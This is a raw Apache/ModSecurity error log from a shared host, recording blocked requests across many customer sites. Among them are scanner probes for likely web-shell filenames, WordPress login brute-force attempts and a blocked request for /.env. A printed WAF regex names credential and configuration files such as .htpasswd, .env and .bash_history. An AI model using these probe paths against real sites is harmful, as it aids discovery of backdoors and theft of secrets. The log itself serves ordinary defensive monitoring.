[Tue May 26 13:32:28.572386 2026] [security2:error] [pid 512745:tid 512917] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTlHKSB_s2CvZg7xN6UQAAATQ"]
[Tue May 26 13:32:29.372212 2026] [security2:error] [pid 512745:tid 512976] [client 4.228.83.111:64361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/0x.php"] [unique_id "ahVTlXKSB_s2CvZg7xN6ZgAAAW8"]
[Tue May 26 13:32:29.372344 2026] [security2:error] [pid 512745:tid 512976] [client 4.228.83.111:64361] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/0x.php"] [unique_id "ahVTlXKSB_s2CvZg7xN6ZgAAAW8"]
[Tue May 26 13:32:30.089438 2026] [security2:error] [pid 512745:tid 512995] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTlXKSB_s2CvZg7xN6agAAAYI"]
[Tue May 26 13:32:30.388211 2026] [autoindex:error] [pid 512745:tid 512881] [client 205.210.31.180:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:32:31.973168 2026] [security2:error] [pid 512745:tid 512967] [client 114.119.138.185:31847] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/yenilikci-ve-etkili-web-tasarim-trendleri/"] [unique_id "ahVTl3KSB_s2CvZg7xN6kwAAAWY"], referer: https://citygateaccountants.co.uk/2025/
[Tue May 26 13:32:32.654534 2026] [security2:error] [pid 512745:tid 512876] [client 4.228.83.111:64332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/k.php"] [unique_id "ahVTmHKSB_s2CvZg7xN6mwAAAQs"]
[Tue May 26 13:32:32.654644 2026] [security2:error] [pid 512745:tid 512876] [client 4.228.83.111:64332] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/k.php"] [unique_id "ahVTmHKSB_s2CvZg7xN6mwAAAQs"]
[Tue May 26 13:32:33.227519 2026] [security2:error] [pid 512745:tid 512929] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTmHKSB_s2CvZg7xN6oAAAAUA"]
[Tue May 26 13:32:34.068149 2026] [security2:error] [pid 512745:tid 512779] [remote 216.73.217.110:4428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVTmnKSB_s2CvZg7xN6uAABQiE"]
[Tue May 26 13:32:35.344901 2026] [security2:error] [pid 512745:tid 512877] [client 176.65.139.239:23210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "chettinadavenue.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVTm3KSB_s2CvZg7xN6yQAAAQw"]
[Tue May 26 13:32:35.421272 2026] [security2:error] [pid 512745:tid 512957] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTmnKSB_s2CvZg7xN6xQAAAVw"]
[Tue May 26 13:32:36.077972 2026] [security2:error] [pid 512745:tid 512926] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTmnKSB_s2CvZg7xN6wgABPWU"]
[Tue May 26 13:32:36.417272 2026] [security2:error] [pid 512344:tid 512570] [client 4.228.83.111:62931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/o.php"] [unique_id "ahVTnMbElyei4S77DQcOqwAAAGA"]
[Tue May 26 13:32:36.417414 2026] [security2:error] [pid 512344:tid 512570] [client 4.228.83.111:62931] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/o.php"] [unique_id "ahVTnMbElyei4S77DQcOqwAAAGA"]
[Tue May 26 13:32:37.063941 2026] [security2:error] [pid 512745:tid 512897] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTnHKSB_s2CvZg7xN64QAAASA"]
[Tue May 26 13:32:37.821697 2026] [security2:error] [pid 512745:tid 512940] [client 4.228.83.111:64383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/bb.php"] [unique_id "ahVTnXKSB_s2CvZg7xN68AAAAUs"]
[Tue May 26 13:32:37.821838 2026] [security2:error] [pid 512745:tid 512940] [client 4.228.83.111:64383] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/bb.php"] [unique_id "ahVTnXKSB_s2CvZg7xN68AAAAUs"]
[Tue May 26 13:32:39.824700 2026] [security2:error] [pid 512344:tid 512537] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTn8bElyei4S77DQcO1wAAAD8"]
[Tue May 26 13:32:40.966273 2026] [security2:error] [pid 512745:tid 512970] [client 4.228.83.111:64329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/rip.php"] [unique_id "ahVToHKSB_s2CvZg7xN7GgAAAWk"]
[Tue May 26 13:32:40.966418 2026] [security2:error] [pid 512745:tid 512970] [client 4.228.83.111:64329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/rip.php"] [unique_id "ahVToHKSB_s2CvZg7xN7GgAAAWk"]
[Tue May 26 13:32:41.299054 2026] [security2:error] [pid 512344:tid 512589] [client 173.249.15.100:52140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVTocbElyei4S77DQcO6AAAAHM"], referer: https://www.cagmedya.com/edirne-web-tasarim/
[Tue May 26 13:32:41.497691 2026] [security2:error] [pid 512745:tid 512958] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVToXKSB_s2CvZg7xN7IAAAAV0"]
[Tue May 26 13:32:43.320113 2026] [security2:error] [pid 512745:tid 512921] [client 4.228.83.111:37696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/s.php"] [unique_id "ahVTo3KSB_s2CvZg7xN7RQAAATg"]
[Tue May 26 13:32:43.320203 2026] [security2:error] [pid 512745:tid 512921] [client 4.228.83.111:37696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/s.php"] [unique_id "ahVTo3KSB_s2CvZg7xN7RQAAATg"]
[Tue May 26 13:32:43.798033 2026] [security2:error] [pid 512745:tid 512888] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTo3KSB_s2CvZg7xN7SgAAARc"]
[Tue May 26 13:32:44.790390 2026] [security2:error] [pid 512344:tid 512406] [remote 5.189.189.33:60726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.189.189.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVTpMbElyei4S77DQcPAgAAIz0"]
[Tue May 26 13:32:46.590789 2026] [security2:error] [pid 512745:tid 512890] [client 4.228.83.111:45576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-content/admin.php"] [unique_id "ahVTpnKSB_s2CvZg7xN7hgAAARk"]
[Tue May 26 13:32:46.590879 2026] [security2:error] [pid 512745:tid 512890] [client 4.228.83.111:45576] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-content/admin.php"] [unique_id "ahVTpnKSB_s2CvZg7xN7hgAAARk"]
[Tue May 26 13:32:46.716469 2026] [security2:error] [pid 512745:tid 512941] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTpnKSB_s2CvZg7xN7gwAAAUw"]
[Tue May 26 13:32:47.571750 2026] [security2:error] [pid 512344:tid 512519] [client 153.67.187.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTp8bElyei4S77DQcPHAAAAC0"]
[Tue May 26 13:32:48.685978 2026] [security2:error] [pid 512344:tid 512555] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTqMbElyei4S77DQcPIQAAAFE"]
[Tue May 26 13:32:49.075309 2026] [security2:error] [pid 512745:tid 512913] [client 4.228.83.111:64347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/gelay.php"] [unique_id "ahVTqXKSB_s2CvZg7xN7yQAAATA"]
[Tue May 26 13:32:49.075410 2026] [security2:error] [pid 512745:tid 512913] [client 4.228.83.111:64347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/gelay.php"] [unique_id "ahVTqXKSB_s2CvZg7xN7yQAAATA"]
[Tue May 26 13:32:51.042340 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTqnKSB_s2CvZg7xN75gAAARI"]
[Tue May 26 13:32:51.667883 2026] [security2:error] [pid 512745:tid 512966] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVTq3KSB_s2CvZg7xN78wAAAWU"], referer: https://www.bloggertarget.com
[Tue May 26 13:32:52.576834 2026] [security2:error] [pid 512745:tid 512899] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTrHKSB_s2CvZg7xN8CwAAASI"]
[Tue May 26 13:32:52.740435 2026] [security2:error] [pid 512745:tid 512879] [client 4.228.83.111:37746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVTrHKSB_s2CvZg7xN8FgAAAQ4"]
[Tue May 26 13:32:52.740531 2026] [security2:error] [pid 512745:tid 512879] [client 4.228.83.111:37746] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVTrHKSB_s2CvZg7xN8FgAAAQ4"]
[Tue May 26 13:32:55.110796 2026] [security2:error] [pid 512745:tid 512949] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTrnKSB_s2CvZg7xN8NAAAAVQ"]
[Tue May 26 13:32:56.412965 2026] [security2:error] [pid 512745:tid 512895] [client 114.119.146.246:64119] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVTsHKSB_s2CvZg7xN8XwAAAR4"]
[Tue May 26 13:32:56.493233 2026] [security2:error] [pid 512745:tid 512837] [remote 51.68.87.127:62244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVTsHKSB_s2CvZg7xN8XgABXFs"]
[Tue May 26 13:32:57.697868 2026] [security2:error] [pid 512344:tid 512511] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTscbElyei4S77DQcPhAAAACU"]
[Tue May 26 13:32:59.382932 2026] [security2:error] [pid 512344:tid 512543] [client 4.228.83.111:62974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/adminfuns.php"] [unique_id "ahVTs8bElyei4S77DQcPnwAAAEU"]
[Tue May 26 13:32:59.383014 2026] [security2:error] [pid 512344:tid 512543] [client 4.228.83.111:62974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/adminfuns.php"] [unique_id "ahVTs8bElyei4S77DQcPnwAAAEU"]
[Tue May 26 13:33:00.016139 2026] [security2:error] [pid 512745:tid 512998] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTs3KSB_s2CvZg7xN8lwAAAYU"]
[Tue May 26 13:33:01.607607 2026] [security2:error] [pid 512344:tid 512562] [client 74.7.241.142:41406] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVTtcbElyei4S77DQcPwwAAWGE"]
[Tue May 26 13:33:01.985489 2026] [security2:error] [pid 512344:tid 512574] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTtcbElyei4S77DQcPyAAAAGQ"]
[Tue May 26 13:33:02.046366 2026] [security2:error] [pid 512745:tid 512892] [client 4.228.83.111:62968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpanel/wp-admin/css/"] [unique_id "ahVTtnKSB_s2CvZg7xN8qwAAARs"]
[Tue May 26 13:33:02.366179 2026] [security2:error] [pid 512344:tid 512501] [client 74.7.230.61:60964] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVTtsbElyei4S77DQcP0wAAG2k"]
[Tue May 26 13:33:02.409739 2026] [security2:error] [pid 512745:tid 512899] [client 4.228.83.111:62968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahVTtnKSB_s2CvZg7xN8sgAAASI"]
[Tue May 26 13:33:02.409860 2026] [security2:error] [pid 512745:tid 512899] [client 4.228.83.111:62968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahVTtnKSB_s2CvZg7xN8sgAAASI"]
[Tue May 26 13:33:03.853508 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTt3KSB_s2CvZg7xN8wwAAAWs"]
[Tue May 26 13:33:04.395602 2026] [security2:error] [pid 512745:tid 512772] [remote 146.196.64.107:48936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVTuHKSB_s2CvZg7xN8zAABYho"]
[Tue May 26 13:33:05.831675 2026] [security2:error] [pid 512344:tid 512464] [remote 161.35.162.136:33018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.162.35.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVTucbElyei4S77DQcP_gAAZXc"]
[Tue May 26 13:33:06.579852 2026] [security2:error] [pid 512344:tid 512483] [client 4.228.83.111:64322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/about.php"] [unique_id "ahVTusbElyei4S77DQcQBwAAAAk"]
[Tue May 26 13:33:06.579964 2026] [security2:error] [pid 512344:tid 512483] [client 4.228.83.111:64322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/about.php"] [unique_id "ahVTusbElyei4S77DQcQBwAAAAk"]
[Tue May 26 13:33:06.591639 2026] [security2:error] [pid 512745:tid 512889] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTunKSB_s2CvZg7xN86QAAARg"]
[Tue May 26 13:33:08.701787 2026] [security2:error] [pid 512745:tid 512933] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTu3KSB_s2CvZg7xN8_QABRHM"]
[Tue May 26 13:33:08.945488 2026] [security2:error] [pid 512745:tid 512946] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTvHKSB_s2CvZg7xN9CwAAAVE"]
[Tue May 26 13:33:10.139358 2026] [security2:error] [pid 512745:tid 512883] [client 4.228.83.111:37707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/go.php"] [unique_id "ahVTvnKSB_s2CvZg7xN9HQAAARI"]
[Tue May 26 13:33:10.139457 2026] [security2:error] [pid 512745:tid 512883] [client 4.228.83.111:37707] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/go.php"] [unique_id "ahVTvnKSB_s2CvZg7xN9HQAAARI"]
[Tue May 26 13:33:10.309419 2026] [security2:error] [pid 512344:tid 512601] [client 14.162.165.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTvcbElyei4S77DQcQNQAAAH8"]
